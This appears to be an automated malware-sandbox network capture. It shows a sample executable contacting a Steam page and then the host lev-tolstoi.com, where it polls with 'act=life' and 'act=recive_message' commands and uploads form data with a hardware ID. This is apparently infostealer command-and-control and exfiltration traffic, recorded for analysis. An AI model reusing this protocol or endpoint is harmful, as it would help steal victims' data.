                                                                                                                                                                                                                                                              Set-Cookie: sessionid=871bf20f18b503033007da11; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                              2024-12-28 08:29:40 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                              2024-12-28 08:29:40 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                              Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                              2024-12-28 08:29:40 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                              Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.2.1049701172.67.157.2544438048C:\Users\user\Desktop\hx0wBsOjkQ.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-28 08:29:41 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                                              2024-12-28 08:29:41 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-28 08:29:42 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:42 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=sh44lokv0k8vrkmqhugcm4g2jp; expires=Wed, 23 Apr 2025 02:16:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XcwXoNrFVAR8QlCuvnlOWAHsZCJbGyknIs8Ybm4mqrWZRZb9oQi8kVKoN%2FIu1ieuZr4FgIu%2FXB%2FGam3N%2F2QZA%2B2ufxo1DF%2FDS260hr%2FKyAmbkYPVqDI9AjZdPe7Y37AZEO8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f222f487ce7-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2023&rtt_var=764&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1427872&cwnd=199&unsent_bytes=0&cid=5c7b0cf9bd9af7ae&ts=760&x=0"
                                                                                                                                                                                                                                                              2024-12-28 08:29:42 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-12-28 08:29:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              2192.168.2.1049702172.67.157.2544438048C:\Users\user\Desktop\hx0wBsOjkQ.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-28 08:29:43 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 47
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                                              2024-12-28 08:29:43 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                              2024-12-28 08:29:44 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:44 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=s8hcj4khn36ekl7mdrtu8sl6du; expires=Wed, 23 Apr 2025 02:16:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nlsVOUXf%2BRyVJ99x3h3L0VzLpDNZGMiJH2gLNHoawkxYfvp0E6rfhTV%2F3HuVK%2FsrFTyYf2iwpn072SB7nFDHhz24OlqffjFLUog92o1okj0lS8gTrG9XSNXjwl3SWYreqGU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f2ecb451a30-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=2017&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=946&delivery_rate=1444829&cwnd=252&unsent_bytes=0&cid=1e5deb868bd06228&ts=752&x=0"
                                                                                                                                                                                                                                                              2024-12-28 08:29:44 UTC246INData Raw: 63 34 38 0d 0a 79 6f 4b 36 78 59 70 53 39 32 49 50 47 74 71 70 31 64 51 6b 4f 41 36 31 33 49 6b 71 76 62 68 76 33 4e 30 67 56 65 58 72 4a 71 57 78 6f 4d 7a 6e 73 47 62 62 51 48 78 2f 2b 4a 4f 68 70 6c 46 64 49 70 65 39 37 51 69 48 33 67 36 77 72 6b 56 35 78 35 31 4c 68 2f 44 6b 32 36 6e 35 4e 39 74 41 61 6d 4c 34 6b 34 36 76 42 6c 31 67 6c 2b 61 72 54 39 66 61 44 72 43 2f 51 54 36 4b 6d 30 72 47 6f 75 37 64 72 65 38 78 6b 77 4e 6a 64 37 2f 4d 73 4c 56 4f 56 6d 66 59 74 4f 51 49 6b 5a 6f 4b 70 76 38 61 64 36 69 4f 55 73 53 48 34 38 6d 75 71 43 2f 62 47 53 31 2f 74 49 76 76 39 6b 56 64 62 4e 6d 36 37 55 48 56 30 41 65 34 76 6b 51 2f 6c 59 4a 41 7a 61 4c 67 33 71 7a 6c 4f 49 63 4f 61 58 43 30 79 72 71 31 42 68 51 73 30 4b 61 72 45
                                                                                                                                                                                                                                                              Data Ascii: c48yoK6xYpS92IPGtqp1dQkOA613Ikqvbhv3N0gVeXrJqWxoMznsGbbQHx/+JOhplFdIpe97QiH3g6wrkV5x51Lh/Dk26n5N9tAamL4k46vBl1gl+arT9faDrC/QT6Km0rGou7dre8xkwNjd7/MsLVOVmfYtOQIkZoKpv8ad6iOUsSH48muqC/bGS1/tIvv9kVdbNm67UHV0Ae4vkQ/lYJAzaLg3qzlOIcOaXC0yrq1BhQs0KarE
                                                                                                                                                                                                                                                              2024-12-28 08:29:44 UTC1369INData Raw: 4a 2b 4a 50 37 32 75 55 79 4b 4b 6d 55 4b 48 74 36 37 42 35 2b 38 38 31 56 67 74 63 4c 54 46 73 72 56 4a 58 57 33 58 72 4f 52 49 33 4e 49 46 75 72 56 4e 4f 49 69 48 54 73 43 67 36 64 2b 6f 37 7a 69 54 44 32 34 34 39 6f 75 77 72 67 59 43 4c 50 65 75 36 45 76 4c 31 78 7a 2b 6f 41 77 75 78 34 35 49 68 2f 43 67 33 71 6e 70 50 5a 55 53 5a 58 4f 7a 7a 71 57 39 54 31 64 68 31 37 50 68 52 39 7a 61 43 72 53 31 54 54 32 44 68 45 6e 42 71 4f 43 59 36 61 67 33 6a 55 41 31 4f 4a 76 4f 70 37 46 4b 54 43 37 74 2f 76 51 47 78 70 6f 4b 73 76 38 61 64 34 2b 4d 52 38 53 6a 37 39 75 76 34 79 4b 56 45 6d 74 31 76 64 6d 78 73 30 68 51 62 38 57 30 35 55 37 63 30 77 61 33 75 6b 55 7a 78 38 63 45 77 4c 43 67 67 4f 66 4a 50 5a 34 4d 5a 32 2b 34 69 36 6a 34 58 78 70 72 32 2f 36 7a
                                                                                                                                                                                                                                                              Data Ascii: J+JP72uUyKKmUKHt67B5+881VgtcLTFsrVJXW3XrORI3NIFurVNOIiHTsCg6d+o7ziTD2449ouwrgYCLPeu6EvL1xz+oAwux45Ih/Cg3qnpPZUSZXOzzqW9T1dh17PhR9zaCrS1TT2DhEnBqOCY6ag3jUA1OJvOp7FKTC7t/vQGxpoKsv8ad4+MR8Sj79uv4yKVEmt1vdmxs0hQb8W05U7c0wa3ukUzx8cEwLCggOfJPZ4MZ2+4i6j4Xxpr2/6z
                                                                                                                                                                                                                                                              2024-12-28 08:29:44 UTC1369INData Raw: 48 2b 38 51 49 77 6e 38 6b 63 68 34 4c 6a 7a 4b 54 69 63 71 41 44 59 33 61 2f 33 66 65 70 43 45 4d 73 30 4c 4b 72 45 4a 2f 58 44 4c 61 35 55 44 69 4b 69 6b 72 4a 70 2b 58 58 72 2b 67 77 6d 41 56 70 63 37 50 49 75 72 4a 55 55 47 7a 66 75 2b 70 43 31 5a 70 44 2f 72 68 61 64 39 2f 4a 64 64 43 6a 6f 75 32 6b 35 6a 36 53 46 69 31 6e 39 74 4c 33 73 55 6f 61 4e 4a 65 7a 34 30 33 61 31 51 79 30 73 55 63 39 69 34 46 4b 78 4c 72 76 33 4b 66 6b 4f 4a 38 4e 59 33 79 77 77 72 79 39 51 46 70 74 33 66 36 6c 43 4e 6a 43 54 65 62 2f 64 6a 43 4c 68 45 75 46 6e 65 50 57 71 65 38 6d 31 52 38 6a 59 66 6a 4d 75 2f 59 65 47 6d 44 65 76 75 42 43 32 39 6f 4b 73 37 70 42 4d 49 53 45 51 38 32 6d 35 39 79 72 34 54 32 54 41 47 70 38 76 64 6d 79 76 30 70 57 4c 4a 6e 2b 37 46 43 66 67
                                                                                                                                                                                                                                                              Data Ascii: H+8QIwn8kch4LjzKTicqADY3a/3fepCEMs0LKrEJ/XDLa5UDiKikrJp+XXr+gwmAVpc7PIurJUUGzfu+pC1ZpD/rhad9/JddCjou2k5j6SFi1n9tL3sUoaNJez403a1Qy0sUc9i4FKxLrv3KfkOJ8NY3ywwry9QFpt3f6lCNjCTeb/djCLhEuFnePWqe8m1R8jYfjMu/YeGmDevuBC29oKs7pBMISEQ82m59yr4T2TAGp8vdmyv0pWLJn+7FCfg
                                                                                                                                                                                                                                                              2024-12-28 08:29:44 UTC167INData Raw: 4f 64 39 2f 4a 54 63 36 36 37 74 61 75 35 54 61 64 42 32 4e 31 73 38 32 38 73 55 46 63 59 64 2b 7a 37 6b 76 65 33 67 65 73 76 45 6b 39 69 6f 4d 45 69 65 6a 6e 77 4f 65 77 63 4c 49 4d 52 47 69 6a 32 61 48 32 57 52 52 31 6c 37 6e 6e 43 49 65 61 44 72 47 32 54 54 2b 50 68 6b 76 44 70 75 62 65 71 75 30 2f 6e 78 4a 6c 64 72 58 41 75 4c 31 55 57 6d 48 54 73 75 39 41 31 4e 42 4e 38 50 39 46 4c 38 66 52 42 50 4b 6c 37 39 69 6b 2f 6e 43 4b 54 6e 51 34 76 38 66 33 37 67 5a 57 59 74 65 78 35 30 54 55 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: Od9/JTc667tau5TadB2N1s828sUFcYd+z7kve3gesvEk9ioMEiejnwOewcLIMRGij2aH2WRR1l7nnCIeaDrG2TT+PhkvDpubequ0/nxJldrXAuL1UWmHTsu9A1NBN8P9FL8fRBPKl79ik/nCKTnQ4v8f37gZWYtex50TU
                                                                                                                                                                                                                                                              2024-12-28 08:29:44 UTC1369INData Raw: 33 63 64 34 0d 0a 30 67 79 79 73 55 55 79 6a 6f 46 4d 31 61 6e 6b 30 4b 62 6d 50 35 51 45 61 48 32 38 7a 4c 4f 77 53 52 6f 69 6c 37 6e 7a 43 49 65 61 49 70 6d 4b 41 42 61 39 79 56 75 4a 73 61 44 66 71 36 68 6f 31 51 78 75 64 4c 44 45 73 62 39 4b 55 47 58 63 73 75 42 4d 30 39 4d 49 75 4c 35 48 4d 6f 61 4e 53 4d 32 75 34 39 75 6f 35 7a 2b 64 51 43 4d 34 76 39 50 33 37 67 5a 2f 65 39 79 77 37 51 6a 41 6c 42 54 2b 75 45 35 33 33 38 6c 49 7a 71 37 6d 33 61 76 70 4e 70 30 46 5a 58 79 35 7a 62 47 31 53 56 35 70 31 72 48 76 52 4e 48 51 44 4c 2b 7a 53 54 69 4d 6a 41 53 4a 36 4f 66 41 35 37 42 77 70 41 4e 37 62 36 6a 48 39 36 6b 49 51 79 7a 51 73 71 73 51 6e 39 73 66 74 4c 56 4d 4d 6f 69 4d 52 38 69 76 37 64 36 72 34 6a 6d 64 42 6d 4a 78 71 73 69 37 75 45 46 55 59
                                                                                                                                                                                                                                                              Data Ascii: 3cd40gyysUUyjoFM1ank0KbmP5QEaH28zLOwSRoil7nzCIeaIpmKABa9yVuJsaDfq6ho1QxudLDEsb9KUGXcsuBM09MIuL5HMoaNSM2u49uo5z+dQCM4v9P37gZ/e9yw7QjAlBT+uE5338lIzq7m3avpNp0FZXy5zbG1SV5p1rHvRNHQDL+zSTiMjASJ6OfA57BwpAN7b6jH96kIQyzQsqsQn9sftLVMMoiMR8iv7d6r4jmdBmJxqsi7uEFUY
                                                                                                                                                                                                                                                              2024-12-28 08:29:44 UTC1369INData Raw: 48 32 4e 30 45 74 61 31 49 4d 49 43 43 54 4d 79 6e 35 73 71 72 35 69 4b 51 45 6e 38 34 39 6f 75 77 72 67 59 43 4c 4f 47 35 2b 31 6a 63 6d 44 79 6f 76 46 51 38 69 6f 55 45 32 4f 62 35 6d 4b 44 6b 63 4d 31 41 61 33 65 78 79 4c 69 33 54 31 5a 68 30 72 66 75 53 64 6e 65 42 37 53 2f 52 44 47 47 6a 45 37 45 71 65 72 52 6f 4f 41 33 6c 68 49 74 4e 76 6a 4d 72 2f 59 65 47 6b 58 51 72 4f 56 59 6e 38 56 44 70 2f 39 46 4f 38 66 52 42 4d 4f 69 37 39 79 67 35 44 61 51 42 6d 42 35 74 38 71 33 75 55 4a 52 5a 64 47 2f 35 6b 33 53 33 68 2b 30 74 45 30 37 6a 6f 56 4a 68 2b 61 67 33 37 2b 6f 61 4e 55 78 59 48 61 32 7a 4b 48 32 57 52 52 31 6c 37 6e 6e 43 49 65 61 44 4c 4b 77 51 54 69 45 69 6b 58 4e 75 76 4c 55 72 75 41 31 6d 51 74 6a 66 71 72 4e 75 4c 39 46 57 57 58 51 74 75
                                                                                                                                                                                                                                                              Data Ascii: H2N0Eta1IMICCTMyn5sqr5iKQEn849ouwrgYCLOG5+1jcmDyovFQ8ioUE2Ob5mKDkcM1Aa3exyLi3T1Zh0rfuSdneB7S/RDGGjE7EqerRoOA3lhItNvjMr/YeGkXQrOVYn8VDp/9FO8fRBMOi79yg5DaQBmB5t8q3uUJRZdG/5k3S3h+0tE07joVJh+ag37+oaNUxYHa2zKH2WRR1l7nnCIeaDLKwQTiEikXNuvLUruA1mQtjfqrNuL9FWWXQtu
                                                                                                                                                                                                                                                              2024-12-28 08:29:44 UTC1369INData Raw: 43 71 2f 2f 47 69 47 58 6e 6b 50 59 35 76 6d 59 6f 4f 52 77 7a 55 42 72 63 62 37 4d 73 62 68 55 58 32 72 59 73 65 4a 42 32 39 49 4f 76 72 74 47 4d 49 4b 4b 53 4d 79 76 34 39 65 6a 34 54 36 63 44 79 30 32 2b 4d 79 76 39 68 34 61 54 63 79 39 35 30 57 66 78 55 4f 6e 2f 30 55 37 78 39 45 45 79 36 62 6c 32 4b 33 75 4e 4a 41 47 5a 33 32 34 77 4c 53 35 51 6c 78 6f 32 4c 37 67 51 64 37 63 43 4c 53 30 52 44 71 45 6a 30 4b 48 35 71 44 66 76 36 68 6f 31 53 42 32 64 62 54 4d 39 36 6b 49 51 79 7a 51 73 71 73 51 6e 39 45 42 75 72 68 43 4f 6f 53 42 51 63 4f 69 35 64 69 76 2b 6a 69 56 42 33 39 71 75 4d 4b 79 75 6b 56 61 61 4e 47 33 37 55 76 62 6d 6b 50 2b 75 46 70 33 33 38 6c 70 79 36 2f 4a 33 37 79 6f 4c 39 73 5a 4c 58 2b 30 69 2b 2f 32 52 31 46 6d 32 4c 50 6f 54 74 7a
                                                                                                                                                                                                                                                              Data Ascii: Cq//GiGXnkPY5vmYoORwzUBrcb7MsbhUX2rYseJB29IOvrtGMIKKSMyv49ej4T6cDy02+Myv9h4aTcy950WfxUOn/0U7x9EEy6bl2K3uNJAGZ324wLS5Qlxo2L7gQd7cCLS0RDqEj0KH5qDfv6ho1SB2dbTM96kIQyzQsqsQn9EBurhCOoSBQcOi5div+jiVB39quMKyukVaaNG37UvbmkP+uFp338lpy6/J37yoL9sZLX+0i+/2R1Fm2LPoTtz
                                                                                                                                                                                                                                                              2024-12-28 08:29:44 UTC1369INData Raw: 33 73 75 78 35 38 45 6e 2f 71 75 6d 4c 57 6f 61 4e 56 48 62 6d 71 71 7a 62 53 67 52 52 31 53 36 5a 6e 39 51 74 6a 4b 43 71 6d 77 41 6e 6e 48 68 67 53 66 6b 61 44 52 6f 50 4d 68 67 77 31 39 66 2f 6a 30 2b 66 5a 65 47 6a 53 58 69 2b 68 47 30 64 30 62 72 2f 4a 6c 49 59 32 4f 56 4d 43 2f 37 35 6a 70 71 44 62 56 57 44 34 32 2b 4d 2b 6d 39 68 34 4b 50 6f 7a 72 75 42 2b 50 69 42 4c 77 70 67 49 68 78 39 45 57 69 65 6a 79 6d 50 2b 6f 64 35 59 53 66 33 36 37 33 62 54 78 65 47 52 4c 7a 62 50 74 58 38 37 6b 4d 37 6d 6c 54 7a 47 51 6d 41 6a 53 71 2b 37 57 6f 50 35 77 32 30 42 69 4f 4f 44 79 39 2f 34 47 5a 53 4b 58 70 71 73 51 6e 2b 38 4f 73 4c 46 46 49 5a 62 45 59 39 32 6c 35 73 2b 32 71 48 37 56 42 69 30 67 36 49 58 33 73 6c 63 61 4e 49 66 73 73 42 32 4d 6a 56 33 73
                                                                                                                                                                                                                                                              Data Ascii: 3sux58En/qumLWoaNVHbmqqzbSgRR1S6Zn9QtjKCqmwAnnHhgSfkaDRoPMhgw19f/j0+fZeGjSXi+hG0d0br/JlIY2OVMC/75jpqDbVWD42+M+m9h4KPozruB+PiBLwpgIhx9EWiejymP+od5YSf3673bTxeGRLzbPtX87kM7mlTzGQmAjSq+7WoP5w20BiOODy9/4GZSKXpqsQn+8OsLFFIZbEY92l5s+2qH7VBi0g6IX3slcaNIfssB2MjV3s
                                                                                                                                                                                                                                                              2024-12-28 08:29:44 UTC1369INData Raw: 6d 63 52 38 6d 6d 35 38 36 32 71 48 37 56 44 79 30 67 67 59 76 2f 39 6e 6b 55 4c 4d 2f 2b 73 77 6a 71 32 51 4f 77 75 46 51 6d 79 71 35 4b 77 4b 6e 32 79 4c 44 6e 63 4e 74 41 61 7a 6a 67 6d 66 6e 32 51 6b 73 73 6a 2b 36 35 45 34 71 4a 57 75 37 74 58 58 6d 65 79 56 4b 48 38 4c 4b 57 35 2f 70 77 7a 55 41 71 65 36 72 5a 73 62 56 51 57 53 76 70 67 4d 78 47 32 4e 73 62 72 71 68 4e 65 4b 6d 2f 5a 66 6d 57 39 64 75 70 35 6a 65 44 45 53 30 32 2b 4d 54 33 37 6e 38 61 4a 4a 65 42 70 51 6a 48 6d 6c 58 2b 69 6b 45 35 69 59 35 53 31 75 58 48 31 71 44 70 4a 6f 55 58 59 6a 65 57 2f 5a 62 32 43 42 70 71 6c 2b 61 35 42 70 2f 65 48 50 37 6e 45 6d 58 63 33 42 65 51 2b 4c 4c 48 36 66 46 77 67 30 41 31 4b 76 61 4c 70 66 59 65 47 69 76 55 72 50 6c 4f 33 4d 77 4f 2b 59 46 38 45
                                                                                                                                                                                                                                                              Data Ascii: mcR8mm5862qH7VDy0ggYv/9nkULM/+swjq2QOwuFQmyq5KwKn2yLDncNtAazjgmfn2Qkssj+65E4qJWu7tXXmeyVKH8LKW5/pwzUAqe6rZsbVQWSvpgMxG2NsbrqhNeKm/ZfmW9dup5jeDES02+MT37n8aJJeBpQjHmlX+ikE5iY5S1uXH1qDpJoUXYjeW/Zb2CBpql+a5Bp/eHP7nEmXc3BeQ+LLH6fFwg0A1KvaLpfYeGivUrPlO3MwO+YF8E


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              3192.168.2.1049703172.67.157.2544438048C:\Users\user\Desktop\hx0wBsOjkQ.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-28 08:29:46 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=37NC9T5A4478IQUMN
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 12841
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                                              2024-12-28 08:29:46 UTC12841OUTData Raw: 2d 2d 33 37 4e 43 39 54 35 41 34 34 37 38 49 51 55 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 41 42 43 38 35 38 30 42 37 41 45 39 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 33 37 4e 43 39 54 35 41 34 34 37 38 49 51 55 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 37 4e 43 39 54 35 41 34 34 37 38 49 51 55 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                                                                                                                                                                              Data Ascii: --37NC9T5A4478IQUMNContent-Disposition: form-data; name="hwid"5DABC8580B7AE972BEBA0C6A975F1733--37NC9T5A4478IQUMNContent-Disposition: form-data; name="pid"2--37NC9T5A4478IQUMNContent-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                                                                                                                                                                              2024-12-28 08:29:47 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:46 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=nk8ur7hj8ej7ujra71gjiau9jf; expires=Wed, 23 Apr 2025 02:16:25 GMT; Max-Age=9999999; path=/
